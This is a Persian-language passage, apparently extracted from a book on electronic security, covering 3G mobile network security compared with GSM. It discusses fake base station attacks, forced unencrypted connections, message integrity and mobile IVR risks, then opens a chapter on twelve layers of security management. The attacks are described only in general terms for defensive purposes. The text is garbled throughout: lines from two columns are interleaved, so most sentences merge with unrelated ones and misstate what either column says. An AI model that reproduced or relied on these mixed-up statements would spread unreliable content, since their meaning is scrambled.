ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ .ﻫﺪﻑ ﺍﻭﻟﻴﺔ ﺍﻳﻦ ﻃﺮﺡ ﺑـﺎﻻﺑﺮﺩﻥ ﺳـﺮﻋﺖ ﺍﻧﺘﻘـﺎﻝ ﺍﺯ ﭘﺮﺩﺍﺧﺘﻬﺎﻱ ﻧﺰﺩﻳﻚ ﺑﻲﺳﻴﻢ
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﻧﺴﻞ ﺳﻮﻡ ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻣﻨﻴﺖ GSMﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺍﺳـﺖ، ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ
ﺍﻣﺎ ﺑﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺮ:
ﺧﺪﻣﺎﺕ ﭘﺎﺳﺦ ﺗﻌﺎﻣﻠﻲ ﺻﻮﺗﻲ ﺳﻴﺎﺭ ) ١٧٨(Mobile IVRﻧﺴﺒﺖ ﺑـﻪ
ﻳﻜﻲ ﺍﺯ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺮﺍﻱ ﻏﻠﺒـﻪ ﺑـﺮ ﺣﻤﻠـﻪ ﺍﻱ ﻣﻮﺳـﻮﻡ ﺑـﻪ • ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺁﺳﻴﺐ ﭘـﺬﻳﺮ ﻫـﺴﺘﻨﺪ .ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ IVRﻧﺒﺎﻳـﺪ
ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ١٧٩ﺍﻧﺠﺎﻡ ﮔﺮﻓﺖ .ﺩﺭ ﺍﻳـﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﭘﺮﺑﻬﺎ ﻭ ﻳﺎ ﭘﺮﻣﺨﺎﻃﺮﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺗﻤﺎﻡ ﺍﺗﺼﺎﻻﺕ
ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﻤﺎﺭﺓ ﺗﻮﺍﻟﻲ ﺑﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ - IVRﺍﺯ ﺟﻤﻠــﻪ ﺷــﻤﺎﺭﻩ ﺗﻠﻔــﻦ ﺗﻤــﺎﺱﮔﻴﺮﻧــﺪﻩ ﻭ ﺗﺮﺗﻴــﺐ
ﺍﺿﺎﻓﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ ﺩﺳﺘﮕﺎﻩ ﺳﻴﺎﺭ ﺧﻮﺍﻫﺪ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺸﺘﺮﻱ ﺑﺎﻳﺪ ﺛﺒﺖ ﺷﻮﺩ؛ ﺍﻣـﺎ ﺍﻳـﻦ
ﺗﻮﺍﻧﺴﺖ ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﺩﻫﺪ. ﺛﺒﺘﻬﺎ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻧﺒﺎﻳﺪ ﺷﺎﻣﻞ PINﻭ ﺍﻃﻼﻋﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﻃﻮﻝ ﻛﻠﻴﺪ ﺭﻣـﺰ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓﺘـﻪ ﺗـﺎ ﺍﻣﻜـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ • ﻣﺸﺘﺮﻱ ﮔﺮﺩﺩ.
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻳﺘﺮ ﻫﻢ ﻓﺮﺍﻫﻢ ﺷﻮﺩ.
ﺁﻣﻮﺯﺵ ﻣﺸﺘﺮﻱ
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﻬﺒـﻮﺩ ﺍﻣﻨﻴـﺖ ﺩﺍﺧـﻞ ﺷـﺒﻜﻪﻫـﺎ ﻭ •
ﺑﺎﻧﻜﻬﺎ ﺑﺎﻳﺪ ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻲﺳـﻴﻢ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻟﺤﺎﻅ ﺷﺪﻩ ﺍﺳﺖ.
ﺭﺍ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﺁﻣﻮﺯﺵ ﺩﻫﻨﺪ:
ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﺣﻤﻼﺕ ﻗﺎﺑﻞ ﻗﻴﺎﺱ ﺑﺎ ﺣﻤﻼﺗﻲ ﭼﻮﻥ ﺍﺭﺳﺎﻝ ﺍﻣﻨﻴﺖ ﺑﻪ ﺟﺎﻱ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺳـﻮﺋﻴﭻ ﺷـﺪﻩ •
ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨـﻮﺍﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻡ )ﻣﺜﻞ .(GSMﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺗﺼﺎﻻﺕ ﻣﻴـﺎﻥ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ ﺧﻨﺜﻲ ﻛﻨﻴﻢ ،ﺑﺎ ﻣـﺸﻜﻼﺕ ﺯﻳـﺎﺩﻱ ﺭﻭﺑـﺮﻭ ﺳﻮﺋﻴﭻ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ.
ﻫﺴﺘﻴﻢ. ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻫﻮﻳﺖ ﭘﺎﻳﺎﻧﻪ ) ١٨٠(IMEIﺑﺠـﺎﻱ •
ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ GSMﻭﺟﻮﺩ ﺩﺍﺷﺖ ،ﺍﺯ ﻧﻮ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ.
ﺍﺟﺒﺎﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻣﺰ ﻧﺸﺪﻩ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻌﺮﻳﻒ ﻧـﺸﺪﻩ ،ﺍﻣـﺎ ﺭﺍﻫﻨﻤـﺎﻳﻲ •
ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻧﻴﺰ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﻳـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺳـﻴﺎﺭ
ﺑﺮﺍﻱ ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ.
ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻩ
ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﺪ ،ﻣﻬﺎﺟﻢ ﻗﺮﺑـﺎﻧﻲ ﺭﺍ ﺑـﺎ ﻳـﻚ ﺗﻤـﺎﺱ ﻼ ﺑـﻴﻦ GSMﻭ ﺩﺭ ﺯﻣﺎﻥ ﮔﺸﺖﺯﺩﻥ ﻣﻴﺎﻥ ﺷﺒﻜﻪﻫﺎ ،ﻣﺜ ﹰ •
ﺗﻠﻔﻨﻲ ﻣﺨﺎﻃﺐ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺭﻭﺍﻝ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﻭﻟﻴـﻪ ﺭﺍ ،3GPPﺗﻨﻬﺎ ﺳﻄﺤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻛـﺎﺭﺕ
-ﻛﻪ ﻣﻬﺎﺟﻢ ﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻭ ﺍﻭ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩﻩ ﻫﻮﺷﻤﻨﺪ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛـﺎﺭﺕ
-ﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻋﻨﺎﺻﺮ ﺍﺭﺳﺎﻝ ﺳﻴﮕﻨﺎﻟﻬﺎ ﻃﻮﺭﻱ ﻫﻮﺷــﻤﻨﺪ GSMﺩﺭ ﺷــﺒﻜﻪ 3GPPﺩﺭ ﺑﺮﺍﺑــﺮ ﺣﻤﻠــﺔ
ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺷﺒﻜﻪ ﺍﻳﻨﻄﻮﺭ ﺑﻨﻈﺮ ﺑﺮﺳﺪ ﻛﻪ ﮔﻮﻳﻲ ﻛـﺎﺭﺑﺮ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠـﻲ ﻫﻤﭽﻨـﺎﻥ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ
ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻤﻲﺧﻮﺍﻫﺪ ﺩﺭ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﺪﺍﺭﺩ.
ﻛﻨﺪ .ﭘﺲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﻣﻬﺎﺟﻢ ﺍﺭﺗﺒـﺎﻁ ﺧـﻮﺩ ﺑـﺎ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺳﻴﺴﺘﻢ ﻧﺴﻞ ﺳﻮﻡ ﻧﺴﺒﺖ ﺑـﻪ ﻫﻤﺘـﺎﻱ GSMﺧـﻮﺩ ﺍﺯ ﺍﻣﻨﻴـﺖ
ﻗﻄﻊ ﻣـﻲﻛﻨـﺪ ﻭ ﺑـﺎ ﺣـﻖﺍﺷـﺘﺮﺍﻙ ﺁﻥ ﻛـﺎﺭﺑﺮ ،ﺍﺯ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﻟﺒﺘﻪ ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ
ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺳﻬﺎﻱ ﺟﻌﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ. ﻫﻮﺷﻤﻨﺪﻱ ﻭ ﺯﻳﺮﻛﻲ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﻫﻴﭽﮕـﺎﻩ ﻧﺒﺎﻳـﺪ ﺩﺳـﺖ ﻛـﻢ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﺎﻣﻌﻴﺖ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ ﮔﺮﻓﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ ،ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ ﻧـﺴﻞ
ﺣﻤﻠﻪ ﻣﻨﺠـﺮ ﺷـﻮﺩ .ﺑﻄـﻮﺭ ﺧـﺎﺹ ،ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺩﺍﺩﻩﻫـﺎ ﻭ ﻼ ﺑﻪ ﺁﻧﻬﺎ
ﺳﻮﻡ ﻧﻴﺰ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ ﺣﻤﻼﺕ ﺟﺪﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺫﻳ ﹰ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺭﺳﺎﻝ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﺗﺼﺎﻝ ،ﺑﻪ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ.
ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﻋﺘﺒﺎﺭ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﻣـﺸﺮﻭﻉ ﺭﺍ ﺗـﺸﺨﻴﺺ
ﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺣﻔﺎﻇﺖﺷﺪﺓ ﺟﺎﻣﻌﻴـﺖ ﺩﺭ ﺩﻫﺪ .ﺑﻌﻼﻭﻩ ﺍﺭﺳﺎﻝ ﺩﻭﺭﻩﺍ ﹺ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ
ﻃﻮﻝ ﻳﻚ ﺍﺗﺼﺎﻝ ،ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﺍﺗـﺼﺎﻻﺕ ﺭﻣﺰﻧـﺸﺪﻩ ﺍﻳﻦ ﺣﻤﻠﻪ ،ﺣﻤﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﻳﺎ ﺍﻳـﺴﺘﮕﺎﻩ
ﭘﺲ ﺍﺯ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻭﻟﻴﺔ ﺍﺗﺼﺎﻝ ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺳـﺮﻗﺖ ﺳﻴﺎﺭ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻭ ﺍﺯ ﺍﻳﻦ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺗﺼﺎﻝ ﻣﻴـﺎﻥ ﭘﻴﺎﻣﻬـﺎﻱ ﺩﻭﺭﻩﺍﻱ ﺣﻔـﺎﻇﺘﻲ ﻧﻴـﺰ ﻣﻤﻜـﻦ ﺍﺳـﺖ، ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﺛﺎﺑـﺖ ﺟﻌﻠـﻲ
ﻻ ﭼﻨﺪﺍﻥ ﺑﻜﺎﺭ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﻧﻤـﻲﺁﻳـﺪ .ﺑﻄـﻮﺭ ﻛﻠـﻲﻫﺮﭼﻨﺪ ﻣﻌﻤﻮ ﹰ ﻣﺘﺼﻞ ﺷﻮﺩ .ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﮔﺎﻫﻲ ﺩﺭ ﻧﻘﺶ
ﺍﺗﺼﺎﻻﺗﻲ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺍﺳﺖ ﻫﻤﻴـﺸﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻜﺮﺍﺭﻛﻨﻨﺪﻩ ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ ﺩﺭ ﻧﻘﺶ ﺗﻘﻮﻳـﺖﻛﻨﻨـﺪﺓ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ
ﺩﺳﺘﻪﺍﻱ ﺍﺯ ﺣﻤﻼﺕ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ. ﺗﺒــﺎﺩﻟﻲ ﻣﻴــﺎﻥ ﺷــﺒﻜﻪ ﻭ ﻛــﺎﺭﺑﺮ ﻋﻤــﻞ ﻛﻨــﺪ ،ﻭ ﺩﺭ ﺍﻳــﻦ ﻣﻴــﺎﻥ
ﻣﺠﺪﺩﹰﺍ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻳﺎﺩﺁﻭﺭﻱ ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺍﻳﻦ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺑـﺮ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ.
ﺍﺳﺎﺱ ﺍﻳﻨﻜﻪ ﻓﻨﺎﻭﺭﻱ ﭼﮕﻮﻧﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻫﻤﮕـﻲ ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﭘﻴﺎﻣﻬﺎﻱ ﺗﺒـﺎﺩﻟﻲ ﻣﻴـﺎﻥ
ﺟﻨﺒﺔ ﺗﺌﻮﺭﻱ ﺩﺍﺭﻧﺪ .ﺩﺭ ﻛﻞ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧـﺴﻞ ﺳـﻮﻡ ﺍﺯ ﻟﺤـﺎﻅ ﺷﺒﻜﻪ ﻭ ﻛﺎﺭﺑﺮ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ .ﺣﻔﺎﻇـﺖ ﺍﺯ ﺟﺎﻣﻌﻴـﺖ ﭘﻴﺎﻣﻬـﺎﻱ
ﻓﻨﺎﻭﺭﻱ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺸﺮﻓﺖ ﻛﺮﺩﻩﺍﻧﺪ ،ﺍﻣﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺣﻴﺎﺗﻲ ﺷﺒﻜﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﺑﺮﺧـﻲ ﺣﻤـﻼﺕ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳﻴﺎﺭ ،ﻻﺯﻣﺴﺖ ،ﺳﺎﻳﺮ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ -ﻛﻪ ﺑﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺻـﻮﺭﺕ
ﻣﺪﺍﻭﻡ ﺭﻋﺎﻳﺖ ﺷﻮﻧﺪ. ﻣﻲﮔﻴﺮﺩ -ﻧﻴﺰ ﻛﻤﻚ ﻛﻨﺪ .ﺩﺭ ﺍﻳﻨﺠﺎ ،ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ
ﺗﻨﻬﺎ ﺗﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺩﺍﻣـﻪ ﻳﺎﺑـﺪ ﻛـﻪ ﻧﻔـﻮﺫﮔﺮ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ؛
ﺑﺮﺧﻼﻑ ﺣﻤﻼﺕ ﺑﺎﻻ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﭘﺎﻳﺎﻥ ﺩﺧﺎﻟﺖ ﻧﻔﻮﺫﮔﺮ ﻫﻢ ﺍﺩﺍﻣﻪ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ:
١٨٢
ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻧﻮﻋﻲ ﻓﺮﺁﻳﻨـﺪ ﺩﻭﻭﺟﻬـﻲ
ﺩﺍﻧﺴﺖ .ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﺔ ﺁﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺍﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﺳـﻪ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ
ﻗﺴﻤﺖ ﻋﻤﺪﻩ ﻣﻲ ﺑﺎﺷﺪ :ﺷﻨﺎﺳﺎﺋﻲ ﻭ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺭﺍﺋﻴﻬﺎ ،ﺗﺠﺰﻳـﻪ
ﻭ ﺗﺤﻠﻴﻞ ﻭ ﺗﻌﻴـﻴﻦ ﺍﺭﺯﺵ ﻫﺮﻳـﻚ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ ،ﻭ ﺗﻌﻴـﻴﻦ ﺍﻳﻨﻜـﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ:
ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺗﺮﺗﻴﺐ ﺍﻭﻟﻮﻳﺖ ﭼﻘﺪﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ .ﮔـﺎﻡ
ﺍﻳﺠﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ
ﺩﻭﻡ ﺍﻣﻨﻴﺖ ،ﺗﺪﻭﻳﻦ ﻳﻚ ﺷﻴﻮﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳـﺖ.
ﻗﺴﻤﺘﻬﺎﻱ ﻋﻤﺪﺓ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺗـﺪﻭﻳﻦ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﻛﻠﻴﺎﺕ
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻱ ،ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ )ﺍﻋـﻢ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ
ﻣﺸﺘﺮﻳﺎﻥ( ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﻭ ﻛﻨﺘـﺮﻝ ﻛﻴﻔﻴـﺖ. ﺗﺎ ﺍﻳﻨﺠـﺎﻱ ﺑﺨـﺶ ﺳـﻮﻡ ﻧﻘـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﻛﺎﺭﻛﺮﺩﻫـﺎﻱ ﺁﻥ ﺩﺭ
ﻳﻚ ﻧﻈﺮﻳﺔ ﻣﻌﻘﻮﻝ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ" :ﺑﭙﺬﻳﺮ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ،
ﻫﺪﻑ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻱ؛ ﻭ ﺑﺮﺍﻱ ﻧﺠﺎﺕ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻦ". ﻣﺆﺳﺴﺎﺕ ﻏﻴﺮ ﺍﻧﺘﻔـﺎﻋﻲ ،ﺁﻣﻮﺯﺷـﮕﺎﻫﻬﺎ ،ﻭ ﺍﺩﺍﺭﺍﺕ ﺩﻭﻟﺘـﻲ ﻣـﻮﺭﺩ
ﺑﺨﺶ ﺳﻮﻡ
ﺭﻣﺰﮔﺬﺍﺭﻱ -ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ .۸ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ -ﻳﻚ ﻣﻔﻬﻮﻡ ﻭﺳﻴﻊ ﺑﺮ ﻣﺒﻨـﺎﻱ .۲
ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺣﺎﻝ ﺍﻧﺘﻘﺎﻝ ﻭ ﻳـﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺳـﺮﻗﺖ )ﺍﺯ ﺍﻟﮕــﻮﻱ - OCTAVEﻣﺘﻌﻠــﻖ ﺑــﻪ - CERTﺑــﺮﺍﻱ
ﺭﻭﻱ ﺭﺳﺎﻧﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ؛ ﻣﺜ ﹰﻼ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻳﺎ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ( ﻣﺪﻳﺮﻳﺖ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ.
ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ -ﺑﺮﺭﺳﻲ .۳
ﺁﺯﻣﻮﻥ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻱ -ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﺁﺯﻣـﻮﻥ، .۹ ﻣﺠﺎﺯ ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﻛﺎﺭﺑﺮ ﭘﻴﺶ ﺍﺯ ﺍﻋﻄﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ
